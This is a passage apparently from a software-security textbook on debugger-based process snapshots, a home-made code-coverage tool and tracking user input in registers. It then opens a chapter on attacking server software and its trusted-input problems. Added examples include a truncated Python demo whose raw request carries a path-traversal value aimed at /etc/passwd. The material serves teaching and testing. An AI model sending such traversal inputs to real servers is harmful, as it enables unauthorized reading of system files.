When a breakpoint fires, the program becomes frozen in mid run. All execution in all threads is stopped. It is possible at this point to use the memory routines to read or write any part of the program memory. A typical program will have several relevant memory sections. This is a snapshot of memory from the name server BIND 9.02 running under Windows NT (the tool prints one line per region, giving its base address and size):

You can read these memory sections and restore them. You can think of this as a snapshot of the program. If you allow the program to continue executing, you can freeze it at any time in the future using another breakpoint. At any point where the program is frozen, you can then write back the original memory that you saved earlier. This effectively "restarts" the program at the point where you took the snapshot. This means you can continually keep "rewinding" the program in time.

For automated testing, this is a powerful technique. You can take a snapshot of a program and restart it. After restoring the memory you can then fiddle with memory, add corruption, or simulate different types of attack input. Then, once running, the program will act on the faulty input. You apply this process in a loop and keep testing the same code with different perturbations of input. This automated approach is very powerful and can allow you to test millions of input combinations.

The following code illustrates how to take a snapshot of a target process. The code performs a query on the entire possible range of memory. For each valid location, the memory is copied into a list of structures:

struct mb
{
    MEMORY_BASIC_INFORMATION mbi;
    char *p;
};

std::list<struct mb *> gMemList;

void takesnap()
{
    DWORD start = 0;
    SIZE_T lpRead = 0;
    MEMORY_BASIC_INFORMATION mbi;

    while(start < 0xFFFFFFFF)
    {
        // The query and the committed/read-only test were lost in
        // extraction; they are reconstructed here from the description
        // that follows the code.
        if(!VirtualQueryEx(hProcess, (void *)start, &mbi,
                           sizeof(MEMORY_BASIC_INFORMATION)))
        {
            break;
        }

        if( (mbi.State == MEM_COMMIT) && (mbi.Protect != PAGE_READONLY) )
        {
            struct mb *b = new mb;
            memcpy( (void *)&(b->mbi),
                    (void *)&mbi, sizeof(MEMORY_BASIC_INFORMATION));

            char *p = (char *)malloc(mbi.RegionSize);
            b->p = p;

            lpRead = 0;
            if(!ReadProcessMemory( hProcess,
                                   (void *)start, p,
                                   mbi.RegionSize, &lpRead))
            {
                TRACE("ReadProcessMemory failed %d\nRead %d",
                      GetLastError(), lpRead);
            }
            if(mbi.RegionSize != lpRead)
            {
                TRACE("Read short bytes %d != %d\n",
                      mbi.RegionSize,
                      lpRead);
            }
            gMemList.push_front(b);
        }

        // Stop when the next region would wrap past the top of the address space.
        if(start + mbi.RegionSize < start) break;
        start += mbi.RegionSize;
    }
}

The code uses the VirtualQueryEx API call to test each location of memory from 0 to 0xFFFFFFFF. If a valid memory address is found, the size of the memory region is obtained and the next query is placed just beyond the current region. In this way the same memory region is not queried more than once. If the memory is committed, then this means it's being used. We check that the memory region is not read-only so that we only save memory regions that might be modified. Clearly, read-only memory is not going to be modified, so there is no reason to save it. If you are really careful, you can save all the memory regions. You may suspect that the target program changes memory protections during execution, for example. If you want to restore the program state, you can write back all the saved memory regions:

void setsnap()
{
    std::list<struct mb *>::iterator ff = gMemList.begin();
    while(ff != gMemList.end())
    {
        struct mb *u = *ff;
        if(u)
        {
            SIZE_T lpBytes = 0;

            TRACE("Writing memory based at %p, size %d\n",
                  u->mbi.BaseAddress,
                  u->mbi.RegionSize);

            if(!WriteProcessMemory(hProcess, u->mbi.BaseAddress,
                                   u->p, u->mbi.RegionSize, &lpBytes))
            {
                TRACE("WriteProcessMemory failed, error %d\n",
                      GetLastError());
            }
            if(lpBytes != u->mbi.RegionSize)
            {
                TRACE("Warning, write failed %d != %d\n", lpBytes,
                      u->mbi.RegionSize);
            }
        }
        ff++;
    }
}

The code to write back the memory is much simpler. It does not need to query the memory regions; it simply writes the memory regions back to their original locations.
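The snapshot-and-restore walk above, modelled as an added example that is not the book's code: the Win32 calls are replaced by a constructed FakeTarget (a sample region table, not a real process), which lets the committed/read-only filter and the wrap-around guard at the top of the address space be exercised, and it ends with the snapshot, corrupt, restore loop that the Fault Injection and Process Snapshots sections describe.

```cpp
// Added example (not the book's code): a platform-independent model of the
// takesnap()/setsnap() walk, with a constructed FakeTarget in place of
// VirtualQueryEx, ReadProcessMemory and WriteProcessMemory.
#include <cstdint>
#include <cstring>
#include <list>
#include <vector>

// One region of the constructed map; mirrors the MEMORY_BASIC_INFORMATION
// members the snapshot loop depends on. A saved block reuses the same type.
struct Region {
    uint32_t base;               // BaseAddress
    uint32_t size;               // RegionSize
    bool committed;              // State == MEM_COMMIT
    bool readonly;               // Protect == PAGE_READONLY
    std::vector<uint8_t> data;   // backing bytes, empty unless committed
};

// Stand-in for the debug target; regions tile the whole 32-bit space,
// which is how VirtualQueryEx describes a real process.
struct FakeTarget {
    std::vector<Region> map;
    // VirtualQueryEx stand-in: the region containing addr, or NULL.
    const Region *query(uint32_t addr) const {
        for (const Region &r : map)
            if (addr >= r.base && addr - r.base < r.size) return &r;
        return nullptr;
    }
    // ReadProcessMemory stand-in: returns bytes copied (0 on failure).
    uint32_t read(uint32_t addr, uint8_t *dst, uint32_t n) const {
        const Region *r = query(addr);
        if (!r || !r->committed || addr - r->base + n > r->size) return 0;
        std::memcpy(dst, &r->data[addr - r->base], n);
        return n;
    }
    // WriteProcessMemory stand-in: refuses read-only pages like the real call.
    uint32_t write(uint32_t addr, const uint8_t *src, uint32_t n) {
        Region *r = const_cast<Region *>(query(addr));
        if (!r || !r->committed || r->readonly || addr - r->base + n > r->size) return 0;
        std::memcpy(&r->data[addr - r->base], src, n);
        return n;
    }
};

// takesnap() equivalent: walk upward from address 0 and save every committed,
// writable region (the book's struct mb list). A short read is dropped.
std::list<Region> takesnap(const FakeTarget &t) {
    std::list<Region> snap;
    uint32_t start = 0;
    for (;;) {
        const Region *r = t.query(start);
        if (!r) break;                                   // query failed: stop
        if (r->committed && !r->readonly) {
            Region b{r->base, r->size, true, false, std::vector<uint8_t>(r->size)};
            if (t.read(r->base, b.data.data(), r->size) == r->size)
                snap.push_front(b);
        }
        // Same guard as the book's loop: at the topmost region start + size
        // wraps to 0, which is < start, so the walk ends instead of repeating.
        if (start + r->size < start) break;
        start += r->size;
    }
    return snap;
}

// setsnap() equivalent: write every saved block back to its original address.
// Returns how many blocks were restored in full.
size_t setsnap(FakeTarget &t, const std::list<Region> &snap) {
    size_t ok = 0;
    for (const Region &b : snap)
        if (t.write(b.base, b.data.data(), b.size) == b.size) ++ok;
    return ok;
}

// Constructed map (sample data, not a real process): free space, a read-only
// code page, two writable data regions, and a free region ending exactly at
// the top of the 32-bit address space.
FakeTarget make_target() {
    FakeTarget t;
    t.map.push_back({0x00000000, 0x00010000, false, false, {}});
    t.map.push_back({0x00010000, 0x00001000, true,  true,  std::vector<uint8_t>(0x1000, (uint8_t)0xC3)});
    t.map.push_back({0x00011000, 0x00002000, true,  false, std::vector<uint8_t>(0x2000, (uint8_t)0x41)});
    t.map.push_back({0x00013000, 0x7FFED000, false, false, {}});
    t.map.push_back({0x80000000, 0x00001000, true,  false, std::vector<uint8_t>(0x1000, (uint8_t)0x00)});
    t.map.push_back({0x80001000, 0x7FFFF000, false, false, {}});
    return t;
}

// One fault-injection round trip: snapshot, corrupt the target's data, restore,
// and report whether the corrupted bytes are back to their original values.
bool snapshot_roundtrip() {
    FakeTarget t = make_target();
    std::list<Region> snap = takesnap(t);
    uint8_t junk[16];
    std::memset(junk, 0xFF, sizeof junk);
    t.write(0x00011100, junk, sizeof junk);          // corrupt both writable regions
    t.write(0x80000010, junk, sizeof junk);
    if (t.query(0x00011100)->data[0x100] != 0xFF) return false;   // corruption landed
    return setsnap(t, snap) == snap.size()
        && t.query(0x00011100)->data[0x100] == 0x41
        && t.query(0x80000010)->data[0x10] == 0x00;
}
```

The read-only code page is skipped and only the two writable regions are saved, so a restore never touches memory the target could not have modified itself.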

Disassembling Machine Code

A debugger needs to be able to disassemble instructions. A breakpoint or single-step event will leave each thread of the target process pointing to some instruction. By using the thread CONTEXT functions you can determine the address in memory where the instruction lives, but this does not reveal the actual instruction itself. The memory at that address needs to be "disassembled" to determine the instruction. Fortunately, you don't need to write a disassembler from scratch. Microsoft supplies a disassembler with the OS. This disassembler is used, for example, by the Dr. Watson utility when a crash occurs. We can borrow from this existing tool to provide disassembly functions in our debugger:

    // Open a handle to the thread that just stopped. theThread is our own
    // per-thread record (see below), holding the thread ID, the process
    // handle and the CONTEXT captured at the stop.
    HANDLE hThread = fOpenThread( THREAD_ALL_ACCESS,
                                  FALSE,
                                  theThread->m_thread_id );
    if(hThread == NULL)
    {
        _error_out("[!] Failed to Open the thread handle !\n");
        return FALSE;
    }

    // The Dr. Watson disassembler works on a DEBUGPACKET: the thread's
    // saved CONTEXT plus the process and thread handles it needs in order
    // to read the target's memory.
    DEBUGPACKET dp;
    dp.context  = theThread->m_ctx;
    dp.hProcess = theThread->m_hProcess;
    dp.hThread  = hThread;

    // Disassemble the instruction at the current instruction pointer.
    // The decoded text is written into m_instruction.
    DWORD ulOffset = dp.context.Eip;
    if ( disasm( &dp,
                 &ulOffset,
                 (PUCHAR)m_instruction,
                 FALSE ) )
    {
        ret = TRUE;
    }
    else
    {
        _error_out("error disassembling instruction\n");
        ret = FALSE;
    }

    CloseHandle(hThread);

A user-defined thread structure is used in this code. The context is obtained so we know which instruction is being executed. The disasm function call is published in the Dr. Watson source code and can easily be incorporated into your project. We encourage you to locate the source code to Dr. Watson to add the relevant disassembly functionality. Alternatively, there are other open-source disassemblers available that provide similar functionality.


Building a Basic Code Coverage Tool

As we mentioned early in the chapter, all the available coverage tools, commercial or otherwise, lack significant features and data visualization methods that are important to the attacker. Instead of fighting with expensive and deficient tools, why not write your own? In this section we present one of the jewels of this book: a simple code coverage tool that can be built using the debugging API calls that are described elsewhere in this book. The tool should track all conditional branches in the code. If a conditional branch can be controlled by user-supplied input, this should be noted. Of course, the goal is to determine whether the input set has exercised all possible branches that can be controlled.

For the purposes of this example, the tool will run the processor in single-step mode and will track each instruction using a disassembler. The core object we are tracking is a code location. A location is a single continuous block of instructions with no branches. Branch instructions connect all the code locations together. That is, one code location branches to another code location. We want to track all the code locations that have been visited and determine whether user-supplied input is being processed in the code location. The structure we are using to track code locations is as follows:

    // A code location: a straight-line run of instructions that ends at
    // a branch. Locations are the nodes of the coverage graph.
    struct item
    {
        item()
        {
            subroutine=FALSE;
            is_conditional=FALSE;
            isret=FALSE;
            boron=FALSE;
            address=0;
            length=1;
            x=0;
            y=0;
            column=0;
            m_hasdrawn=FALSE;
        }

        bool subroutine;        // Location is the target of a call
        bool is_conditional;    // Location ends in a conditional jump
        bool isret;             // Location ends in a ret
        bool boron;             // User-supplied data was seen here
        bool m_hasdrawn;        // To stop circular references when drawing

        int address;            // Start address of the location
        int length;             // Number of instructions in the location
        int column;             // Layout information for the visualizer
        int x;
        int y;

        std::string m_disasm;   // Disassembly text of the location
        std::string m_borons;   // Boron tag hits recorded for the location

        // Branch targets reached from this location
        std::list<struct item *> mChildren;

        // Find a child location by start address; NULL if there is none.
        struct item * lookup(DWORD addr)
        {
            std::list<struct item *>::iterator i = mChildren.begin();
            while(i != mChildren.end())
            {
                struct item *g = *i;
                if(g->address == addr) return g;
                i++;
            }
            return NULL;
        }
    };

Each location has a list of pointers to all branch targets from the location. It also has a string that represents the assembly instructions that make up the location. The following code executes on each single-step event:

    struct item *anItem = NULL;

    // Make sure we have a fresh context.
    theThread->GetThreadContext();

    // Disassemble the target instruction.
    m_disasm.Disasm( theThread );

    // Determine if this is the target of a branch instruction.
    if(m_next_is_target || m_next_is_calltarget)
    {
        anItem = OnBranchTarget( theThread );
        SetCurrentItemForThread( theThread->m_thread_id, anItem );
        m_next_is_target = FALSE;
        m_next_is_calltarget = FALSE;

        // We have branched, so we need to set the parent/child
        // lists.
        if(old_item)
        {
            // Determine if we are already in the child list.
            if(NULL == old_item->lookup(anItem->address))
            {
                old_item->mChildren.push_back(anItem);
            }
        }
    }
    else
    {
        anItem = GetCurrentItemForThread( theThread->m_thread_id );
    }

    // Append the instruction text to the location's disassembly.
    if(anItem)
    {
        anItem->m_disasm += m_disasm.m_instruction;
        anItem->m_disasm += '\n';
    }

    // Classify the instruction. strstr() matches anywhere in the
    // disassembly text, operands included, so "call", "ret" and "jmp"
    // are tested first. "jl" also matches "jle" and "jg" matches "jge";
    // both set the same flags, so that order is harmless.
    char *_c = m_disasm.m_instruction;
    if(strstr(_c, "call"))
    {
        m_next_is_calltarget = TRUE;
    }
    else if(strstr(_c, "ret"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->isret = TRUE;
    }
    else if(strstr(_c, "jmp"))
    {
        m_next_is_target = TRUE;
    }
    else if(strstr(_c, "je"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jne"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jl"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jle"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jz"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jnz"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jg"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else if(strstr(_c, "jge"))
    {
        m_next_is_target = TRUE;
        if(anItem) anItem->is_conditional = TRUE;
    }
    else
    {
        // Not a branching instruction,
        // so add one to the current item length.
        if(anItem) anItem->length++;
    }

    //////////////////////////////////////////////
    // Check for boron tag.
    //////////////////////////////////////////////
    if(anItem && mTagLen)
    {
        if(check_boron(theThread, _c, anItem)) anItem->boron = TRUE;
    }

    old_item = anItem;

First, we see the code gets a fresh context structure for the thread that just single-stepped. The instruction pointed to by the instruction pointer is disassembled. If the instruction is the beginning of a new code location, the list of currently mapped locations is queried so that we don't make double entries. The instruction is then compared with a list of known branching instructions, and appropriate flags are set in the item structure. Note that only a subset of the x86 conditional jumps is listed; an instruction such as ja or jbe falls through to the final else and is counted as part of the current location, so a real tool should cover the full set. Finally, a check is made for boron tags. The code for a boron tag check is presented in the following section.
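The location-tracking logic above, written as a portable model that runs without a target process. This is an added example, not the book's code: it feeds a constructed instruction trace (address plus disassembly text, as a single-stepping debugger would produce) through the same rules and builds the graph of locations. Two things differ from the listing above, as a practitioner would want: the branch test looks only at the mnemonic instead of searching the whole disassembly string, and it covers the full set of x86 conditional jumps; a location also records each instruction address once, so loop iterations do not inflate its length. The class and function names, the addresses and the trace itself are assumptions made for the example.

```cpp
// Portable model of the single-step location tracking shown above: it takes an
// instruction trace (address + disassembly text), as a single-stepping debugger
// would produce, and builds the graph of code locations. Added example, not the
// book's code; the trace is constructed, not captured from a real process.
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <map>
#include <set>
#include <string>
#include <vector>

enum class BranchKind { None, Call, Ret, Jmp, Jcc };

struct Location {
    uint32_t address = 0;               // start address of the location
    std::set<uint32_t> instructions;    // addresses recorded in this location
    bool is_conditional = false;        // ends in a conditional jump
    bool is_ret = false;                // ends in a ret
    std::vector<Location*> children;    // branch targets reached from here
    Location* lookup(uint32_t addr) const {
        for (Location* c : children) if (c->address == addr) return c;
        return nullptr;
    }
};

// Mnemonic = first token, lower-cased. Testing it alone avoids the false hits
// a substring search gets from operands such as "[retbuf]" or "call_table".
std::string mnemonic(const std::string& text) {
    std::size_t b = text.find_first_not_of(" \t");
    if (b == std::string::npos) return "";
    std::size_t e = text.find_first_of(" \t", b);
    std::string tok = text.substr(b, e == std::string::npos ? std::string::npos : e - b);
    for (char& c : tok) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    return tok;
}

BranchKind classify(const std::string& text) {
    static const std::set<std::string> jcc = {
        "je", "jne", "jz", "jnz", "jl", "jle", "jg", "jge", "ja", "jae", "jb", "jbe",
        "js", "jns", "jo", "jno", "jp", "jnp", "jpe", "jpo", "jc", "jnc", "jcxz",
        "jecxz", "loop", "loope", "loopne", "loopz", "loopnz"};
    const std::string m = mnemonic(text);
    if (m == "call") return BranchKind::Call;
    if (m == "ret" || m == "retn" || m == "retf") return BranchKind::Ret;
    if (m == "jmp") return BranchKind::Jmp;
    return jcc.count(m) ? BranchKind::Jcc : BranchKind::None;
}

class CoverageTracker {
public:
    CoverageTracker() = default;
    CoverageTracker(const CoverageTracker&) = delete;  // children hold raw pointers

    // Called once per single-step event with the instruction at eip.
    Location* step(uint32_t eip, const std::string& text) {
        if (next_is_target_ || current_ == nullptr) {
            Location* target = find_or_create(eip);
            // Link where we came from to where we landed, without duplicate edges.
            if (current_ && current_->lookup(eip) == nullptr) current_->children.push_back(target);
            current_ = target;
            next_is_target_ = false;
        }
        // A set, so loop iterations do not inflate the location's length.
        current_->instructions.insert(eip);
        switch (classify(text)) {
        case BranchKind::Ret: current_->is_ret = true; next_is_target_ = true; break;
        case BranchKind::Jcc: current_->is_conditional = true; next_is_target_ = true; break;
        case BranchKind::Call: case BranchKind::Jmp: next_is_target_ = true; break;
        case BranchKind::None: break;
        }
        return current_;
    }
    const Location* at(uint32_t addr) const {
        auto it = locations_.find(addr);
        return it == locations_.end() ? nullptr : &it->second;
    }
    const std::map<uint32_t, Location>& locations() const { return locations_; }

private:
    Location* find_or_create(uint32_t addr) {
        auto it = locations_.find(addr);
        if (it == locations_.end()) { it = locations_.emplace(addr, Location{}).first; it->second.address = addr; }
        return &it->second;  // std::map nodes never move, so the pointer stays valid
    }
    std::map<uint32_t, Location> locations_;
    Location* current_ = nullptr;
    bool next_is_target_ = false;
};

// Constructed trace: a loop that runs twice, then returns. The jmp back to
// 0x401002 lands inside the first location; like the tool above, this model
// simply starts a second, overlapping location there.
struct Summary { std::size_t locations, edges, conditionals, entry_len; bool loops_back, exit_ret; };

Summary summarize_sample_trace() {
    const std::pair<uint32_t, const char*> trace[] = {
        {0x401000, "xor ecx, ecx"}, {0x401002, "cmp ecx, 2"}, {0x401005, "jge 0x401010"},
        {0x401007, "inc ecx"}, {0x401009, "jmp 0x401002"}, {0x401002, "cmp ecx, 2"},
        {0x401005, "jge 0x401010"}, {0x401007, "inc ecx"}, {0x401009, "jmp 0x401002"},
        {0x401002, "cmp ecx, 2"}, {0x401005, "jge 0x401010"}, {0x401010, "ret"}};
    CoverageTracker t;
    for (const auto& ins : trace) t.step(ins.first, ins.second);
    Summary s{t.locations().size(), 0, 0, t.at(0x401000)->instructions.size(),
              t.at(0x401002)->lookup(0x401007) == t.at(0x401007), t.at(0x401010)->is_ret};
    for (const auto& kv : t.locations()) {
        s.edges += kv.second.children.size();
        if (kv.second.is_conditional) ++s.conditionals;
    }
    return s;
}
```

For the constructed trace the model ends with four locations (0x401000, 0x401002, 0x401007 and 0x401010), four distinct edges even though the loop body was entered twice, and two conditional locations. In a real debugger the `step` call is made from the single-step handler with the value of Eip and the text returned by the disassembler.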

Checking for Boron Tags

When a breakpoint or single-step event has occurred, the debugger may wish to query memory for boron tags (that is, substrings that are known to be user supplied). Using the memory query routines introduced earlier in the book, we can make some fairly intelligent queries for boron tags. Because CPU registers are used constantly to store pointers to data, it makes sense to check all the CPU registers for valid memory pointers when the breakpoint or single step has occurred. If the register points to valid memory, we can then query that memory and look for a boron tag. The fact is that any code location that is using user-supplied data typically has a pointer to these data in one of the registers. To check the registers, you can use a routine like this:

    bool check_boron( CDThread *theThread, char *c, struct item *ip )
    {
        // If any of the registers point to the user buffer, tag this.
        DWORD reg;

        // Only look at a register if the instruction text mentions it.
        if(strstr(c, "eax"))
        {
            reg = theThread->m_ctx.Eax;
            if(can_read( theThread, (void *)reg ))
            {
                SIZE_T lpRead;
                char string[255];
                // mTagLen must be smaller than sizeof(string); the
                // terminator goes right after the bytes read below.
                string[mTagLen] = '\0';

                // Read the target memory.
                if(ReadProcessMemory( theThread->m_hProcess,
                                      (void *)reg, string, mTagLen, &lpRead))
                {
                    if(strstr( string, mBoronTag ))
                    {
                        // Found the boron string.
                        ip->m_borons += "EAX: ";
                        ip->m_borons += c;
                        ip->m_borons += " -> ";
                        ip->m_borons += string;
                        ip->m_borons += '\n';
                        return TRUE;
                    }
                }
            }
        }
        ....
        // Repeat this block for all the registers EAX, EBX, ECX, EDX, ESI, and EDI.

        return FALSE;
    }

To save room, we didn't paste the code for all registers, just the EAX register. The code should query all registers listed in the comment. The function returns TRUE if the supplied boron tag is found behind one of the memory pointers. Two limitations are worth noting: the read is exactly mTagLen bytes long, so the tag is found only when the register points at its first byte, and strstr() stops at the first NUL byte, so a tag that follows a NUL within the window is missed.
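The same register scan, written table-driven over all six registers with the memory read injected so it can be exercised offline. This is an added example, not the book's code: the memory reader stands in for ReadProcessMemory(), and the request buffer, its address and the register values are constructed for the example. It reads a window larger than the tag, so a register pointing a few bytes ahead of the tag still hits, and it searches by length rather than with strstr(), so an embedded NUL does not end the search early.

```cpp
// Table-driven version of the register scan in check_boron(). The memory
// reader is injected so the logic runs against a constructed buffer here; in
// the debugger it would wrap ReadProcessMemory(). Added example, not the
// book's code; addresses, register values and the request text are made up.
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <functional>
#include <string>
#include <utility>
#include <vector>

struct Regs { uint32_t eax, ebx, ecx, edx, esi, edi; };

// Reads up to len bytes at addr into out; returns bytes read, 0 if unmapped.
using MemReader = std::function<std::size_t(uint32_t addr, char* out, std::size_t len)>;

struct BoronHit {
    std::string reg;      // register that pointed at (or near) the tag
    uint32_t    addr;     // value of that register
    std::size_t offset;   // where the tag starts within the window read
};

// Scan the registers named in the instruction text for a pointer to the tag.
std::vector<BoronHit> scan_registers_for_tag(const std::string& instr, const Regs& r,
                                             const MemReader& reader, const std::string& tag,
                                             std::size_t window = 64) {
    std::vector<BoronHit> hits;
    if (tag.empty()) return hits;
    std::string lower(instr);
    std::transform(lower.begin(), lower.end(), lower.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    const std::pair<const char*, uint32_t> regs[] = {
        {"eax", r.eax}, {"ebx", r.ebx}, {"ecx", r.ecx},
        {"edx", r.edx}, {"esi", r.esi}, {"edi", r.edi}};
    std::vector<char> buf(window);
    for (const auto& reg : regs) {
        if (lower.find(reg.first) == std::string::npos) continue;  // not referenced here
        if (reg.second == 0) continue;                               // never a user buffer
        std::size_t got = reader(reg.second, buf.data(), buf.size());
        if (got < tag.size()) continue;                              // unmapped or too short
        std::string view(buf.data(), got);                           // length-aware: NULs are data
        std::size_t pos = view.find(tag);
        if (pos != std::string::npos) hits.push_back({reg.first, reg.second, pos});
    }
    return hits;
}

// Constructed target memory: one mapped region holding a request line with
// the boron tag in the query string. Everything else reads as unmapped.
static const uint32_t kBufBase = 0x00120000;
static const char kRequest[] = "GET /index.html?name=BORONBORON HTTP/1.0";
static const std::string kTag = "BORONBORON";

std::size_t fake_read(uint32_t addr, char* out, std::size_t len) {
    const uint32_t end = kBufBase + sizeof(kRequest);   // includes the trailing NUL
    if (addr < kBufBase || addr >= end) return 0;       // unmapped page
    std::size_t avail = end - addr;
    std::size_t n = len < avail ? len : avail;
    std::memcpy(out, kRequest + (addr - kBufBase), n);
    return n;
}

// Registers as they might look while the server parses the request: eax at
// the buffer start, esi five bytes before the tag, ebx pointing nowhere.
std::vector<BoronHit> demo_hits(const std::string& instr) {
    Regs r{kBufBase, 0xdeadbeef, 0, 0, kBufBase + 16, 0};
    return scan_registers_for_tag(instr, r, fake_read, kTag);
}
```

With these values, `cmp byte [esi], 0x20` reports one hit through ESI (the tag starts five bytes into the window, which the exact-length read in the listing above would have missed), `mov eax, [esi+4]` reports hits through both EAX and ESI, and `push ebx` reports nothing because the read fails, the equivalent of can_read() returning false.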

Conclusion

All software is made up of machine-readable code. In fact, code is what makes every program function the way it does. The code defines the software and the decisions it will make. Reverse engineering, as applied to software, is the process of looking for patterns in this code. By identifying certain code patterns, an attacker can locate potential software vulnerabilities.

This chapter has exposed you to the basic concepts and methods of decompilation, all in the name of better understanding how a program really works. We've even gone so far as to provide some rudimentary (yet still powerful) tools as examples. Using these methods and tools, you can learn almost anything you need to know about a target, and then use this information to exploit it.


Chapter 4. Exploiting Server Software

Hacking a computer by sitting down in front of it with a boot disk borders on the trivial. However, a boot disk attack requires sitting in front of a console that may have physical controls (including, say, armed guards and dogs). The only serious skill required to carry out this sort of attack is breaking and entering. For this reason, physical security of the armed guard sort is necessary to secure the most security-critical computers in the world (think National Security Agency). Of course, taken to the extreme, the most secure computer is not connected to a network, remains "off" at all times, has its disk wiped, and is buried under four tons of concrete. The problem with extreme physical security is that the most secure computer also appears to be completely useless! In the real world people like to do things with their computers. So they plug them in, boot them up, wire them to the Net, and start tapping away at the keyboard.

On the Internet, very little is done to secure most machines. Insecure machines, plugged in right out of the box, are "naked." The Internet is, for the most part, a collection of naked machines strung together like so many tin cans with string between them. The problem is so bad that a script kiddie wanna-be can literally download an exploit tool that is more than two years old from a public Web site and still successfully attack a surprisingly large number of machines. There are always targets to practice against on the Net. In more realistic scenarios, a target network will be somewhat more secure, using the latest software patches, running an intrusion detection system to uncover known attacks, and having a firewall or two with some real auditing equipment to boot.

Of course, software can be exploited anywhere, not just on machines connected to the Internet. "Old-fashioned" networks still exist in the form of telephone networks, leased lines, high-speed laser transmission, frame relay, X.25, satellite, and microwave. But the risks are similar, even if the communications protocols are not.

Remote attacks (attacks across the network) are much less dangerous to the attacker from a physical perspective than attacks requiring physical access to a machine. It's always good to avoid physical peril such as bullet wounds and dog bites (not to mention prison). However, remote attacks tend to be technically more complex, requiring more than a modicum of engineering skill. A remote attack always involves attacking networked software. Software that listens on the network and performs activities for remote users is what we call server software. Server software is the target of remote attacks.

This chapter is about exploiting server software. We focus mostly on Internet-based software, but keep in mind that other forms of server software fall prey to the same attacks we describe here. Server software can be exploited for any number of reasons. Perhaps the programmer lacked security expertise. Perhaps the designer made bad assumptions about the friendliness of the environment. Perhaps poor development tools or broken protocols were used. All these problems lead to vulnerabilities. A number of exploits have as their root cause incredibly simple (and silly) mistakes such as misused APIs (think gets()). These kinds of bugs appear to be glaring oversights on the part of developers, but remember that most developers today remain blithely unaware of software security issues. In any case, whether such vulnerabilities are trusted input vulnerabilities, programming errors, miscalculated computations, or simple syntax problems, taken together they all lead to remote exploit.

The most basic kinds of attack we cover in this chapter are introduced in depth in books like Hacking Exposed [McClure et al., 1999]. Most simple server attacks have been captured in highly available tools that you (and others) can download off the Internet. If you need more exposure to the basics of server-side attack, and the use of simple tools, check out that book. We begin here where they left off.

In this chapter we introduce several basic server-side exploit issues, including the trusted input problem, the privilege escalation problem, how to find injection points, and exploiting trust through configuration. We then go on to introduce a set of particular exploit techniques with lots of examples so that you can see how the general issues are put into practice.



The Trusted Input Problem

One very common assumption made by developers and architects is that the users of their software will never be hostile. Unfortunately, this is wrong. Malicious users do exist, especially when software takes input directly from the Internet. Another common mistake is a logical fallacy based on the idea that if the user interface on the client program doesn't allow certain input to be generated, then it can't happen. Wrong again. There is no need for an attacker to use particular client code to generate input to a server. An attacker can simply dip into the sea of raw, seething bits and send some down the wire. Both of these problems are the genesis of many trusted input problems.

Any raw data that exist outside the server software cannot and should not be trusted. Client-side security is an oxymoron. Simply put, all clients will be hacked. Of course the real problem is one of client-side trust. Accepting anything blindly from the client and trusting it through and through is a bad idea, and yet this is often the case in server-side design.

Consider a typical problem. If what should be untrusted data are instead trusted, and the input gets used to build a filename or to access a database, the server code will have explicitly relinquished local system access to a (possibly undeserving) client. Misplaced trust is a pervasive problem, perhaps the most prevalent of all security problems. A potential attacker should not be implicitly trusted by a software system. The transactions performed by a user should always be treated as hostile. Programs that take input from the Internet (even if it is supposedly "filtered" by an application firewall) must be designed defensively. Yet most programs happily take user input and perform file operations, database queries, and system calls based on the raw input.

One basic problem involves the use of a "black list" to filter and remove "bad input." The problem with this approach is that creating and maintaining an exhaustive and complete black list is difficult at best.
A much better approach is to specify what inputs should be allowed in a "white list." Blacklisting mistakes make the attacker's job much easier. Many vulnerabilities exist because user input is trusted and used in ways that allow the user to open arbitrary files, control database queries, and even shut down the system. Some of these attacks can be carried out by anonymous network users. Others require a user account and a password before they can be properly exploited. However, even normal users shouldn't be able to dump entire databases and create files in the root of the file server.

In many cases of standard client–server design, a client program will have a user interface and thus will act as a "middle layer" between a user and the server program. For example, a form on a Web page represents a middle layer between a user and a server program. The client presents a nice graphical form that the user can enter data into. If the user presses the "submit" button, the client code gobbles up all the data on the form, repackages it in a special format, and delivers it to the server. User interfaces are intended to place a layer of abstraction between a human and a server program. Because of this, user interfaces almost never show the nuts and bolts of what is being transmitted from a client to a server.
Likewise, a client program tends to mask much of the data the server may provide. The user interface obscures the data, converts it for "friendly" use, makes it look pretty, and so forth. However, behind the scenes, raw data transmission is taking place. Of course, the client software is only assisting the user in creating a specially formatted request. It is entirely possible to remove the client code from the loop altogether as long as the user can create the specially formatted request manually. But even this simple fact seems to escape notice in the "security architecture" of many on-line applications. Attackers rely on the fact that they can craft hostile client programs or interact with servers directly. One of the most popular "evil client" programs in use by attackers is called netcat. netcat simply opens a dumb port to a remote server. Once this port is established, an attacker can manually enter keystrokes or pipe custom output down the wire to the remote server. Voila, the client has disappeared.
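The two points above, that the client can be removed from the loop entirely and that a blacklist filter is a weak defense, in an added example that is not code from the book. It constructs the raw HTTP request an attacker would type into netcat (no Web form would ever generate it), pulls the file parameter out the way a server would, and resolves it first with a typical blacklist filter and then with a whitelist plus a containment check. DOCROOT, the request bytes and the helper names are assumptions made for illustration.

```python
"""Added example (not from the book): a server handler that builds a filename from a
client-supplied parameter. A typical blacklist filter is shown beside a whitelist
filter, and the request is constructed as raw bytes, the way an attacker would send
it with netcat instead of through the Web form. DOCROOT and the request are made up."""
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

DOCROOT = "/srv/www/docs"  # hypothetical document root of the server

# Constructed request: the browser form would never produce this file= value.
RAW_REQUEST = (
    b"GET /view?file=....//....//....//etc/passwd HTTP/1.0\r\n"
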